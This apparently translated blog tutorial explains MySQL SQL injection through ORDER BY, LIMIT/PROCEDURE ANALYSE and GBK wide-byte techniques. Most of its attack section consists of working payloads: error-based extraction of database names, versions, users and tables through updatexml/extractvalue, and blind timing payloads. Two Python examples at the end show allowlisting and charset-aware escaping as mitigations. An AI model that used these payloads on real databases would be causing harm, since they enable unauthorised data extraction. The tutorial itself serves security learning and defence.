order by injection and limit injection, and wide byte injection
2022-08-10 06:33:00 【fish pass ruler zz】
order by
order by is the clause MySQL uses to sort query results. In injection testing, the order by clause is used to quickly determine the number of columns in the query, which then pairs with a union select statement for echoing data: raise the order by number to a larger integer and watch whether the output changes or errors. If the column name is unknown, a column can be referenced by its ordinal position.
select * from users order by x;
select * from table_name order by column_name (or column number) asc;   -- ascending order (the default)
select * from table_name order by column_name (or column number) desc;  -- descending order
order by injection
1. Get the current database:
select * from users order by id and(updatexml(1,concat(0x7e,(select database()),0x7e),1));
2. Get the version of the database
select * from users order by id and(updatexml(1,concat(0x7e,(select version()),0x7e),1));
3. Get users
select * from users order by id and(updatexml(1,concat(0x7e,(select user()),0x7e),1));
4. Get the number of databases
select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));
5. Get database list information
select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),0));
6. Get the name of the table
select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 0,1),0x7e),0));
Time-based blind injection
order by if(1=1,1,sleep(1))
select * from hehe order by if(1=1,1,sleep(1)); # normal response time
select * from hehe order by if(1=2,1,sleep(1)); # with delay
Delay time = the number of seconds in sleep(1) * the number of rows queried. If the query returns many rows, the delay becomes very long.
order by error injection
Using updatexml
updatexml(1,1,1) takes three parameters; the error is raised from the second parameter.
select * from hehe order by updatexml(1,if(1=1,1,user()),1); # the query is normal
select * from hehe order by updatexml(1,if(1=2,1,user()),1); # the query errors
Using extractvalue
extractvalue(1,1) takes two parameters; the error is raised from the second parameter.
select * from hehe order by extractvalue(1,if(1=1,1,user())); # the query is normal
select * from hehe order by extractvalue(1,if(1=2,1,user())); # the query errors
limit injection
limit x,y returns y records starting from the xth row of the query result.
The common scenario is a paging function: page x is requested and y rows are shown.
The parameters are usually of the form page=x&size=y.
No order by
Execute statement: select id from users limit 0,1;
In this case, union can be appended after limit to perform a joint query injection.
Execute statement: select id from users limit 0,1 union select username from users;
There is an order by
This method applies to versions 5.0.0 < MySQL < 5.6.6.
After the limit clause, two further keywords may follow: PROCEDURE and INTO. Writing a file via INTO requires knowing the absolute path and having permission to write the shell, which makes it hard to use, so PROCEDURE is taken as the example here. The injection uses the PROCEDURE function; ANALYSE accepts two parameters, so first try the default two parameters:
mysql> select id from users order by id desc limit 0,1 procedure analyse(1,1);
ERROR 1386 (HY000): Can't use ORDER clause with this procedure
Next, place an error-based payload in one of the parameters:
mysql> select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.53'
If there is no echo, use delayed injection: if the first character of select version() is 5, execute SHA1(1) many times to produce the delay. sleep() is not supported here, so BENCHMARK is used instead.
mysql> select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1)))),1);
ERROR 1105 (HY000): XPATH syntax error: ':0'
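Both the order by and the limit injections above work because a sort column or a page number is pasted into the SQL string unchecked. As an added example (not code from the original post), the query builder below shows the mitigation: the sort column and direction are checked against an allowlist, since an ORDER BY column cannot be bound as a parameter, and page/size are validated as integers and bound as placeholders. The `users` columns and the `MAX_PAGE_SIZE` limit are assumptions for the example.

```python
# Added example: build a paged, sorted query without letting user input reach
# the SQL text unchecked. The column names below are a hypothetical schema.
import re

ALLOWED_SORT_COLUMNS = {"id", "username", "created_at"}  # assumed schema
ALLOWED_DIRECTIONS = {"asc", "desc"}
MAX_PAGE_SIZE = 100  # assumed application limit


def build_user_page_query(sort, direction, page, size):
    """Return (sql, params) for a paginated SELECT on `users`.

    `sort`, `direction`, `page` and `size` arrive as strings from the query
    string (page=x&size=y). Anything not on the allowlist, or not a plain
    integer, raises ValueError, so expressions such as a function call after
    the column name or a `union` after the limit values never reach the SQL.
    """
    if sort not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"sort column not allowed: {sort!r}")
    if direction.lower() not in ALLOWED_DIRECTIONS:
        raise ValueError(f"sort direction not allowed: {direction!r}")
    # Accept only digit strings for page and size; int() alone would still
    # reject "0,1 union ...", but the regex makes the contract explicit.
    if not (isinstance(page, str) and re.fullmatch(r"\d+", page)):
        raise ValueError(f"page must be a non-negative integer: {page!r}")
    if not (isinstance(size, str) and re.fullmatch(r"\d+", size)):
        raise ValueError(f"size must be a positive integer: {size!r}")
    page_n, size_n = int(page), int(size)
    if not 1 <= size_n <= MAX_PAGE_SIZE:
        raise ValueError(f"size out of range: {size_n}")
    # The column name is interpolated only after the allowlist check; the
    # LIMIT offset and count are bound as parameters (pages are 0-based here).
    sql = (
        f"SELECT id, username FROM users "
        f"ORDER BY {sort} {direction.upper()} LIMIT %s, %s"
    )
    return sql, (page_n * size_n, size_n)
```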
Wide byte injection
Single-byte character set: every character is represented by one byte, as in ASCII (0-127).
Multi-byte character set: some characters are represented by several bytes, while the rest (possibly none) are represented by a single byte.
Wide byte injection exploits a property of MySQL: under GBK encoding, two consecutive bytes are treated as one Chinese character.
When the size of a character is one byte, the character is called narrow byte.
When the size of a character is two bytes, the character is called wide byte.
English characters occupy one byte by default; Chinese characters occupy two bytes.
Common wide-byte encodings: GB2312, GBK, GB18030, BIG5, Shift_JIS, etc.
GBK is an extension of GB2312 for storing Chinese characters. GBK uses a double-byte encoding scheme with the range 8140-FEFE.
Wide byte injection arises from inconsistent character sets, for example when the front end uses UTF-8 and the database uses GBK. When decoding, the database reads two consecutive bytes as a single GBK character, which can swallow the backslash added by the server's escape function, bypassing the escaping and allowing SQL injection.
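The following added example (not code from the original post) makes the mechanism above concrete and shows the defensive counterpart: a byte-level escaper that ignores the connection charset, beside one that decodes the input as GBK first, so a stray lead byte followed by a quote is rejected instead of being merged into a character. The input bytes are constructed for the example; parameterized queries remain the primary fix, this only shows what an escaping layer must do if it is used at all.

```python
# Added example: byte-level escaping vs charset-aware escaping under GBK.


def naive_escape(raw: bytes) -> bytes:
    """Escape quotes/backslashes byte by byte, ignoring the charset.

    A 0x5C is inserted before every quote without knowing whether the
    preceding byte is the lead byte of a two-byte GBK character.
    """
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C):  # ' " \
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def charset_aware_escape(raw: bytes, charset: str = "gbk") -> bytes:
    """Decode with the connection charset, escape in the text domain, re-encode.

    Strict decoding rejects sequences such as a lead byte followed by a quote,
    so the escaping backslash can never become the trail byte of a character.
    """
    try:
        text = raw.decode(charset)  # strict: raises on an invalid sequence
    except UnicodeDecodeError as exc:
        raise ValueError(f"input is not valid {charset}: {exc.reason}") from None
    escaped = []
    for ch in text:
        if ch in ("'", '"', "\\"):
            escaped.append("\\")
        escaped.append(ch)
    return "".join(escaped).encode(charset)


def quote_survives_unescaped(escaped: bytes, charset: str = "gbk") -> bool:
    """True if a server decoding `escaped` as GBK would see a bare quote."""
    text = escaped.decode(charset, errors="replace")
    for i, ch in enumerate(text):
        if ch == "'" and (i == 0 or text[i - 1] != "\\"):
            return True
    return False


# Constructed input: the GBK lead byte 0xDF followed directly by a quote.
TAINTED = b"\xdf'"
```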